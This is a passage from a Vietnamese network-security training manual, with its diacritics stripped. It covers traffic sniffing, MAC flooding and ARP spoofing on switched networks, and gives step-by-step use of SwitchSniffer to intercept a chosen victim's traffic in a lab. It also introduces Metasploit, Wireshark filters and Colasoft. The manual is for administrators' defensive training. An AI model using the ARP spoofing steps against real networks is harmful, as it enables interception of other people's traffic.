b. M hnh phn tch d liu chuyn nghip cho doanh nghip Di y l mt m hnh tch hp gii php phn tch lung d liu, ng dng ca qu trnh Sniffer. D liu u tin c i qua thit b SSL Inspector (ton b traffic s c gii m) d liu ca ngi dng vn khng b gin on. Ton b d liu s c gii m v nhn bn qua mt port khc ca thit b. Lung d liu c i vo thit b phn chia lung thng tin, nhng d liu cn thit s c lc v phn tch trn thit b ny. IDS phn tch cc nguy c an ninh mng Forensic l thit b lu tr ton b bng thng mng v a ra cc bo co chi tit (dng nh Wireshark nhng chi tit hn rt nhiu).

Page | 235 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Mi trng Hub Hub l mt Collision Domain nn vic capture traffic trn mng l hon ton d dng. i vi nhng giao tip khng m ha th d dng c c thng tin. d. K thut Sniffer trong mi trng Switch Switch s dng MAC Address Table forward gi tin ti cc port c th. NE-SW1#show mac address-table Mac Address Table ------------------------------------------Vlan Mac Address Type ---- ------------------ ----All 0100.0ccc.cccc STATIC All 0100.0ccc.cccd STATIC All 0180.c200.0000 STATIC All 0180.c200.0001 STATIC All 0180.c200.0002 STATIC All 0180.c200.0003 STATIC All 0180.c200.0004 STATIC All 0180.c200.0005 STATIC All 0180.c200.0006 STATIC All 0180.c200.0007 STATIC All 0180.c200.0008 STATIC All 0180.c200.0009 STATIC All 0180.c200.000a STATIC All 0180.c200.000b STATIC All 0180.c200.000c STATIC All 0180.c200.000d STATIC All 0180.c200.000e STATIC All 0180.c200.000f STATIC All 0180.c200.0010 STATIC Ports CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU CPU

Cho nn khi mt my mun Sniffer trong mi trng Switch cn phi thc hin: Sniffer chnh thng: Cu hnhPort Monitor trn Switch, mun gim st port no hay VLAN no th lung traffic vo port . MAC Spoofing: lm ngp bng MAC Address Table trn Switch (phng n ny tng i kh. ARP Spoofing: Thay i bng ARP Table trn my cn sniffer v gateway.

Page | 236 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Cng c SwitchSniffer thc hin ArpSpoofing Bc 1: Ci t

Bc 2: Sau khi ci t, h thng hin th thng tin IP v MAC.

Page | 237 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Bc 3: Thit lp Option tn cng ARP Spoofing <-> gateway l gi mo IP-MAC trn c Gateway v my tnh tn cng <- gateway l ch gi mo MAC vi my tnh la chn tn cng -> gateway l ch gi mo MAC trn Gateway (trng hp ny chng li cc my tnh ci t cc chng trnh bo mt).

Bc 4: Scan h thng mng v la chn my tnh cn Attack Arp

Page | 238 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nhn Start tn cng Arp, sau khi thc hin tn cng ARP ton b traffic t my tnh b tn cng v gateway u i qua my tnh ny. e. M hnh Sniffer s dng cng c h tr ARP Attack

Switch

Router

Vmware Bridge Network


ci t Switchsniffer hng lung thng tin

VM1

VM2 ci t cc cng c Sniffer: Wireshark, Cain, Colasoft

Page | 239 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

M hnh tn cng gm 2 my o: My o VM1 ci t cng c Switchsniffer thc hin vic tn cng ARP ton b traffic ca my b tn cng i qua my VM1 mi ra c mng. My o VM2 do cng hub Bridge vi VM1 nn gi tin no i vo VM1 th VM2 cng nhn c, trn my o VM2 ny ci t cc cng c Sniffer nh: Colasoft, Wireshark, Cain & Abel.. capture traffice trn mng. 5. Cng c khai thc l hng Metasploit a. Gii thiu tng quan v cng c Metasploit

Page | 240 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 241 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

b. S dng Metasploit Farmwork

Page | 242 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 243 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 244 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 245 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 246 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 247 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Kt lun Metasploit framwork l mt cng c hiu qu thc hin qu trnh kim tra an ninh mng cho h thng. Metasploit Framwork h tr cng c Scan, Exploit v a ra cc report v cc l hng . 6. S dng Wireshark v Colasoft phn tch gi tin Sau khi xy dng c m hnh Sniffer nh trn thc hin ci t cc cng c Sniffer trn my tnh VM2 thc hin vic Capture d. S dng Wireshark phn tch gi tin v traffic ca h thng mng Ci t Wireshark

Sau khi ci t chy Wireshark cho php Capture Filter (ch la chn nhng IP, phin kt ni, Port dch v) capture. Hoc sau khi Capture Wireshark cho php lc ly nhng thng tin cn thit. Wireshark thc hin capture nhng thng tin cn thit Page | 248 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

La chn card mng thc hin Capture, thit lp Capture Filter capture nhng g cn thit

Thit lp Capture Filter: to or from host IP net 192.168.0.0/24 to dst host IP dst net IP from src host ip Page | 249 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

src host IP port port 53 tcp port 80 tcp portrange 1-500 dst port 80 or dst port 443 (host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443) Sau khi Caputer chng ta c th Filter ly nhng thng tin cn thit

Thit lp Filter cc gi tin capture to or from Page | 250 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

ip.addr==IP to ip.dst==IP from ip.src==IP except ip.addr!=IP port tcp.port eq 80 or tcp.port eq 443 (ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443) Thit lp View c mt Session (TCP Stream)

Xem kt qu s thy c c mt Session telnet gia my 192.168.0.121 v my 192.168.0.194.

Page | 251 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

e. S dng Colasoft phn tch traffic ca h thng mng Nu nh Wireshark l mt cng c Free ngi qun tr c th s dng phn tch gi tin cng nh xem bng thng mng, nhng Wireshark cng cha tht mnh trong vn to cc bng Drashboard xem Realtime, to report thng minh.. Tt c nhng tn ti ca Wireshark u c khc phc bi cng c phn tch gi tin v traffic mng chuyn nghip Colasoft:

Page | 252 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ci t cc tnh nng ca Colasoft

Colasoft c cc tnh nng ph tr cho kh nng Sniffer, sau khi ci t cho php thc hin capture: La chn mt hoc nhiu card mng Capture Bng thng mng hin nay trn card mng Capture Nhn Start

Page | 253 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Giao din ban u

Page | 254 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Thng tin tng hp traffic, packet, address

Phn tch session, ip, application

Page | 255 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tng hp cc giao thc mng

Tng hp traffic c th t mt Endpoint

Page | 256 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tng hp cc Session

Phn tch cu to chi tit ca gi tin

Page | 257 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Session Real time

Log h thng cng kh nng report rt thng minh

Page | 258 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Colasoft cng cho php lc thng tin chi tit hn Wireshark, cng cc tnh nng khc Colasoft ch thc l mt cng c phn tch traffic mng cc mnh, v c th s dng trong m hnh mng thc t Troubleshooting s c mng. VII. KT LUN Ti liu ny cung cp cho ngi c t khi nim c bn nht v bo mt v an ton thng tin cng nh cc kin thc chuyn su. T nhng kin thc ny ngi c c ci nhn tng quan v cc gii php xy dng mt h thng mng an ton. K nng s dng cc cng c Scan v Exploit gip ngi qun tr c kh nng pht hin cc nguy c h thng trc khi hacker c th tm thy.

Page | 259 Copyright by Tocbatdat